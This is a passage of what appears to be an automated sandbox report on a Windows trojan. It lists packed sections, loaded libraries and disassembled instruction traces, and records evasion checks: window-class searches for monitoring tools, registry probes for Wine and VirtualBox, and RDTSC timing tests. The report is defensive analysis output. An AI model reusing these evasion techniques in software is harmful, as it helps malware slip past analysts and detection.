    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00AC8C021_2_00AC8C02
    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00C5BDCE1_2_00C5BDCE
    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00AADD291_2_00AADD29
    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00AAFD101_2_00AAFD10
    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00AA8D621_2_00AA8D62
    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00A96EBF1_2_00A96EBF
    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00A8BEB01_2_00A8BEB0
    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00A94E2A1_2_00A94E2A
    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00AC8E701_2_00AC8E70
    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00AAAE571_2_00AAAE57
    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00BF6FBB1_2_00BF6FBB
    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00AC7FC01_2_00AC7FC0
    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00A88FD01_2_00A88FD0
    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00A8AF101_2_00A8AF10
    Source: C:\Users\user\Desktop\file.exeCode function: String function: 00A8CAA0 appears 48 times
    Source: C:\Users\user\Desktop\file.exeCode function: String function: 00A9D300 appears 152 times
    Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: file.exeStatic PE information: Section: ZLIB complexity 0.9995487830033003
    Source: file.exeStatic PE information: Section: zrjduasp ZLIB complexity 0.9943019572617247
    Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@10/2
    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00AB8220 CoCreateInstance,1_2_00AB8220
    Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
    Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: webio.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: schannel.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: mskeyprotect.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: ncryptsslp.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: dpapi.dllJump to behavior
    Source: file.exeStatic file information: File size 1862144 > 1048576
    Source: file.exeStatic PE information: Raw size of zrjduasp is bigger than: 0x100000 < 0x19d200

    Data Obfuscation

    barindex
    Detected unpacking (changes PE section rights)
    Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 1.2.file.exe.a80000.0.unpack :EW;.rsrc :W;.idata :W; :EW;zrjduasp:EW;mirbuaqc:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;zrjduasp:EW;mirbuaqc:EW;.taggant:EW;
    Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
    Source: file.exeStatic PE information: real checksum: 0x1c75a9 should be: 0x1d1f9b
    Source: file.exeStatic PE information: section name:
    Source: file.exeStatic PE information: section name: .rsrc
    Source: file.exeStatic PE information: section name: .idata
    Source: file.exeStatic PE information: section name:
    Source: file.exeStatic PE information: section name: zrjduasp
    Source: file.exeStatic PE information: section name: mirbuaqc
    Source: file.exeStatic PE information: section name: .taggant
    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00CF40DC push 259CFC36h; mov dword ptr [esp], edx1_2_00CF40E4
    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00CF40DC push 192631FBh; mov dword ptr [esp], edx1_2_00CF40FF
    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00C93084 push 51C75ABBh; mov dword ptr [esp], eax1_2_00C930A7
    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00D5D04F push ecx; mov dword ptr [esp], 290C9100h1_2_00D5D15B
    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00D5D04F push ecx; mov dword ptr [esp], 73ED2AB2h1_2_00D5D170
    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00C60065 push 126DF301h; mov dword ptr [esp], ecx1_2_00C60073
    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00C60065 push ebp; mov dword ptr [esp], eax1_2_00C60178
    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00C60065 push 1C897A5Ch; mov dword ptr [esp], edi1_2_00C6030A
    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00C60065 push 7909E3FCh; mov dword ptr [esp], ecx1_2_00C60451
    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00C60065 push 7FDE1DE9h; mov dword ptr [esp], esi1_2_00C60550
    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00C60065 push edx; mov dword ptr [esp], 71F7FBBAh1_2_00C60582
    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00C60065 push ebx; mov dword ptr [esp], ecx1_2_00C6069B
    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00C60065 push ecx; mov dword ptr [esp], ebp1_2_00C606BD
    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00C60065 push ebx; mov dword ptr [esp], 6FFD4B23h1_2_00C60715
    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00C60065 push esi; mov dword ptr [esp], 4FBBAB48h1_2_00C6075B
    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00C60065 push 4C418A67h; mov dword ptr [esp], edx1_2_00C60779
    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00C60065 push ebp; mov dword ptr [esp], edx1_2_00C607B4
    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00C60065 push ebp; mov dword ptr [esp], ecx1_2_00C60899
    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00C60065 push 375D7A7Fh; mov dword ptr [esp], eax1_2_00C608E4
    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00C60065 push 1A5F5500h; mov dword ptr [esp], ebx1_2_00C6092F
    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00C60065 push edi; mov dword ptr [esp], esp1_2_00C609BD
    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00C60065 push 1EB783DAh; mov dword ptr [esp], edx1_2_00C609D5
    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00C60065 push edx; mov dword ptr [esp], ecx1_2_00C60A28
    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00C60065 push eax; mov dword ptr [esp], edx1_2_00C60A53
    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00C60065 push 762EFEF1h; mov dword ptr [esp], esi1_2_00C60B0F
    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00C60065 push 571D798Fh; mov dword ptr [esp], ebx1_2_00C60C2F
    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00C60065 push edi; mov dword ptr [esp], eax1_2_00C60C54
    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00C60065 push ebx; mov dword ptr [esp], ebp1_2_00C60C9D
    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00C60065 push edx; mov dword ptr [esp], ebx1_2_00C60D7C
    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00C60065 push edx; mov dword ptr [esp], 6DFF9726h1_2_00C60DC4
    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00C60065 push 53FE468Eh; mov dword ptr [esp], edi1_2_00C60E8A
    Source: file.exeStatic PE information: section name: entropy: 7.982390407812277
    Source: file.exeStatic PE information: section name: zrjduasp entropy: 7.953168337560915

    Boot Survival

    barindex
    Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior

    Malware Analysis System Evasion

    barindex
    Tries to detect sandboxes / dynamic malware analysis system (registry check)
    Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
    Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
    Tries to detect virtualization through RDTSC time measurements
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE4411 second address: AE4415 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE4415 second address: AE441F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007FB5F8D48006h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE441F second address: AE3CF5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB5F8D48ABCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c jmp 00007FB5F8D48AC5h 0x00000011 push dword ptr [ebp+122D0445h] 0x00000017 cld 0x00000018 call dword ptr [ebp+122D374Ch] 0x0000001e pushad 0x0000001f pushad 0x00000020 jmp 00007FB5F8D48AC4h 0x00000025 pushad 0x00000026 stc 0x00000027 jmp 00007FB5F8D48AC5h 0x0000002c popad 0x0000002d popad 0x0000002e mov dword ptr [ebp+122D1860h], edx 0x00000034 xor eax, eax 0x00000036 jmp 00007FB5F8D48AC7h 0x0000003b mov edx, dword ptr [esp+28h] 0x0000003f jmp 00007FB5F8D48AC0h 0x00000044 mov dword ptr [ebp+122D3C0Dh], eax 0x0000004a or dword ptr [ebp+122D19F9h], esi 0x00000050 mov esi, 0000003Ch 0x00000055 clc 0x00000056 add esi, dword ptr [esp+24h] 0x0000005a mov dword ptr [ebp+122D3436h], eax 0x00000060 lodsw 0x00000062 jmp 00007FB5F8D48ABFh 0x00000067 mov dword ptr [ebp+122D1860h], ecx 0x0000006d add eax, dword ptr [esp+24h] 0x00000071 jnp 00007FB5F8D48AB7h 0x00000077 mov ebx, dword ptr [esp+24h] 0x0000007b cld 0x0000007c push eax 0x0000007d pushad 0x0000007e push eax 0x0000007f push edx 0x00000080 push eax 0x00000081 push edx 0x00000082 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE3CF5 second address: AE3CF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C64A21 second address: C64A35 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FB5F8D48ABAh 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C64D05 second address: C64D16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB5F8D4800Bh 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C64D16 second address: C64D1C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6525E second address: C65262 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C65262 second address: C65270 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007FB5F8D48ABCh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C65270 second address: C65289 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push edx 0x00000006 pop edx 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007FB5F8D4800Eh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C678AB second address: AE3CF5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB5F8D48AC0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 7C4553E5h 0x00000010 push dword ptr [ebp+122D0445h] 0x00000016 mov edx, dword ptr [ebp+122D3ACDh] 0x0000001c mov edx, ecx 0x0000001e call dword ptr [ebp+122D374Ch] 0x00000024 pushad 0x00000025 pushad 0x00000026 jmp 00007FB5F8D48AC4h 0x0000002b pushad 0x0000002c stc 0x0000002d jmp 00007FB5F8D48AC5h 0x00000032 popad 0x00000033 popad 0x00000034 mov dword ptr [ebp+122D1860h], edx 0x0000003a xor eax, eax 0x0000003c jmp 00007FB5F8D48AC7h 0x00000041 mov edx, dword ptr [esp+28h] 0x00000045 jmp 00007FB5F8D48AC0h 0x0000004a mov dword ptr [ebp+122D3C0Dh], eax 0x00000050 or dword ptr [ebp+122D19F9h], esi 0x00000056 mov esi, 0000003Ch 0x0000005b clc 0x0000005c add esi, dword ptr [esp+24h] 0x00000060 mov dword ptr [ebp+122D3436h], eax 0x00000066 lodsw 0x00000068 jmp 00007FB5F8D48ABFh 0x0000006d mov dword ptr [ebp+122D1860h], ecx 0x00000073 add eax, dword ptr [esp+24h] 0x00000077 jnp 00007FB5F8D48AB7h 0x0000007d mov ebx, dword ptr [esp+24h] 0x00000081 cld 0x00000082 push eax 0x00000083 pushad 0x00000084 push eax 0x00000085 push edx 0x00000086 push eax 0x00000087 push edx 0x00000088 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C67959 second address: C67988 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop ebx 0x00000006 mov eax, dword ptr [eax] 0x00000008 pushad 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e popad 0x0000000f pushad 0x00000010 jnp 00007FB5F8D48006h 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 popad 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 jmp 00007FB5F8D4800Bh 0x00000026 push ebx 0x00000027 pop ebx 0x00000028 popad 0x00000029 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C67988 second address: C67992 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FB5F8D48ABCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C67992 second address: C679D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 sub dword ptr [ebp+122D3436h], edx 0x0000000d push 00000003h 0x0000000f mov dword ptr [ebp+122D19F9h], esi 0x00000015 push 00000000h 0x00000017 push esi 0x00000018 mov ecx, dword ptr [ebp+122D3AF5h] 0x0000001e pop edx 0x0000001f push 00000003h 0x00000021 mov dword ptr [ebp+122D36A6h], ecx 0x00000027 jmp 00007FB5F8D4800Dh 0x0000002c push E24F249Fh 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007FB5F8D4800Ah 0x00000038 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C679D7 second address: C67A6C instructions: 0x00000000 rdtsc 0x00000002 jl 00007FB5F8D48AB8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xor dword ptr [esp], 224F249Fh 0x00000011 push 00000000h 0x00000013 push ecx 0x00000014 call 00007FB5F8D48AB8h 0x00000019 pop ecx 0x0000001a mov dword ptr [esp+04h], ecx 0x0000001e add dword ptr [esp+04h], 00000016h 0x00000026 inc ecx 0x00000027 push ecx 0x00000028 ret 0x00000029 pop ecx 0x0000002a ret 0x0000002b lea ebx, dword ptr [ebp+1245778Eh] 0x00000031 push 00000000h 0x00000033 push edi 0x00000034 call 00007FB5F8D48AB8h 0x00000039 pop edi 0x0000003a mov dword ptr [esp+04h], edi 0x0000003e add dword ptr [esp+04h], 00000015h 0x00000046 inc edi 0x00000047 push edi 0x00000048 ret 0x00000049 pop edi 0x0000004a ret 0x0000004b mov ecx, 45C01C8Dh 0x00000050 xchg eax, ebx 0x00000051 jg 00007FB5F8D48ACFh 0x00000057 push eax 0x00000058 jbe 00007FB5F8D48AD0h 0x0000005e pushad 0x0000005f jmp 00007FB5F8D48AC2h 0x00000064 push eax 0x00000065 push edx 0x00000066 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C67AC6 second address: C67AE5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jbe 00007FB5F8D48006h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FB5F8D48010h 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C67AE5 second address: C67BC7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB5F8D48AC7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov dword ptr [ebp+122D5C33h], ebx 0x00000010 push 00000000h 0x00000012 adc ecx, 7D12994Dh 0x00000018 push 08F7BFF7h 0x0000001d jmp 00007FB5F8D48AC0h 0x00000022 xor dword ptr [esp], 08F7BF77h 0x00000029 mov dword ptr [ebp+122D34F5h], edi 0x0000002f push 00000003h 0x00000031 jmp 00007FB5F8D48AC3h 0x00000036 pushad 0x00000037 jng 00007FB5F8D48ABBh 0x0000003d mov eax, 54554300h 0x00000042 popad 0x00000043 push 00000000h 0x00000045 mov dword ptr [ebp+122D3693h], eax 0x0000004b push 00000003h 0x0000004d and edx, dword ptr [ebp+122D390Dh] 0x00000053 call 00007FB5F8D48AB9h 0x00000058 jmp 00007FB5F8D48AC6h 0x0000005d push eax 0x0000005e pushad 0x0000005f push eax 0x00000060 jne 00007FB5F8D48AB6h 0x00000066 pop eax 0x00000067 jmp 00007FB5F8D48AC8h 0x0000006c popad 0x0000006d mov eax, dword ptr [esp+04h] 0x00000071 jnc 00007FB5F8D48AC2h 0x00000077 mov eax, dword ptr [eax] 0x00000079 jnp 00007FB5F8D48AC4h 0x0000007f push eax 0x00000080 push edx 0x00000081 push eax 0x00000082 pop eax 0x00000083 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C67BC7 second address: C67BCB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C67C6C second address: C67CF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnl 00007FB5F8D48AB8h 0x0000000b popad 0x0000000c nop 0x0000000d call 00007FB5F8D48ABCh 0x00000012 sub dword ptr [ebp+122D3444h], ebx 0x00000018 pop edx 0x00000019 push 00000000h 0x0000001b js 00007FB5F8D48AC3h 0x00000021 call 00007FB5F8D48AB9h 0x00000026 pushad 0x00000027 push edx 0x00000028 jbe 00007FB5F8D48AB6h 0x0000002e pop edx 0x0000002f jmp 00007FB5F8D48ABFh 0x00000034 popad 0x00000035 push eax 0x00000036 jmp 00007FB5F8D48ABCh 0x0000003b mov eax, dword ptr [esp+04h] 0x0000003f jmp 00007FB5F8D48AC3h 0x00000044 mov eax, dword ptr [eax] 0x00000046 push eax 0x00000047 push edx 0x00000048 push eax 0x00000049 push edx 0x0000004a push edi 0x0000004b pop edi 0x0000004c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C67CF1 second address: C67CF7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C67CF7 second address: C67D1C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB5F8D48AC3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jo 00007FB5F8D48AB8h 0x00000015 push ebx 0x00000016 pop ebx 0x00000017 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C67D1C second address: C67D22 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8747C second address: C87493 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007FB5F8D48ABEh 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C87493 second address: C87497 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C50B63 second address: C50B69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C85266 second address: C85278 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C85278 second address: C8527E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8527E second address: C85282 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C85282 second address: C85286 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8555E second address: C85562 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C856E3 second address: C856E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C85892 second address: C858A7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FB5F8D4800Ah 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C858A7 second address: C858AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C858AD second address: C858B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C85A0D second address: C85A13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C85CEF second address: C85CFD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C85CFD second address: C85D33 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB5F8D48AC0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jng 00007FB5F8D48AC8h 0x00000011 jmp 00007FB5F8D48AC2h 0x00000016 pushad 0x00000017 pushad 0x00000018 popad 0x00000019 pushad 0x0000001a popad 0x0000001b pushad 0x0000001c popad 0x0000001d popad 0x0000001e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C85EA6 second address: C85EAE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C85EAE second address: C85EB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C85EB4 second address: C85EC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB5F8D4800Dh 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C85EC5 second address: C85ED7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB5F8D48ABEh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C85ED7 second address: C85EE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C85EE0 second address: C85EFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB5F8D48AC8h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C861EE second address: C861F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
